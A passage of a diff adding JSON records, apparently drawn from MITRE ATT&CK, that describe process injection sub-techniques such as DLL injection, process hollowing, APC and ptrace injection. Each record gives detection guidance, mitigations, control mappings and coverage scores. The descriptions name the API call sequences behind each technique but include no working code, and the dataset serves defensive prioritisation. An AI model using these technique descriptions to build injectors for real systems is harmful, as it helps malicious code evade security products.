Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.014",
+                "name": "Process Injection: VDSO Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1055/014",
+                "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  ",
+                "detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 1.9452380952380952,
+        "adjusted_score": 1.9452380952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.49523809523809526,
+            "mitigation_score": 0.38181818181818183,
+            "detection_score": 0.62
+        },
+        "choke_point_score": 0.44999999999999996,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1055.001",
+        "name": "Process Injection: Dynamic-link Library Injection",
+        "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/001",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.2523809523809524,
+        "adjusted_score": 0.2523809523809524,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.002",
+        "name": "Process Injection: Portable Executable Injection",
+        "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/002",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.19523809523809524,
+        "adjusted_score": 0.19523809523809524,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.003",
+        "name": "Process Injection: Thread Execution Hijacking",
+        "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/003",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.19523809523809524,
+        "adjusted_score": 0.19523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.004",
+        "name": "Process Injection: Asynchronous Procedure Call",
+        "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/004",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.005",
+        "name": "Process Injection: Thread Local Storage",
+        "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/005",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.008",
+        "name": "Process Injection: Ptrace System Calls",
+        "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/008",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Linux"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.009",
+        "name": "Process Injection: Proc Memory",
+        "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/009",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Linux"
+        ],
+        "data_sources": [
+            "File: File Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.2523809523809524,
+        "adjusted_score": 0.2523809523809524,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "SC-18",
+            "SC-7",
+            "SI-16",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.011",
+        "name": "Process Injection: Extra Window Memory Injection",
+        "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/011",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.18571428571428572,
+        "adjusted_score": 0.18571428571428572,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055.012",
+        "name": "Process Injection: Process Hollowing",
+        "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection  before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
+        "url": "https://attack.mitre.org/techniques/T1055/012",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1055",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            }
+        ],
+        "cumulative_score": 0.20952380952380953,
+        "adjusted_score": 0.20952380952380953,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.2",
+            "13.7"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SC-18",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
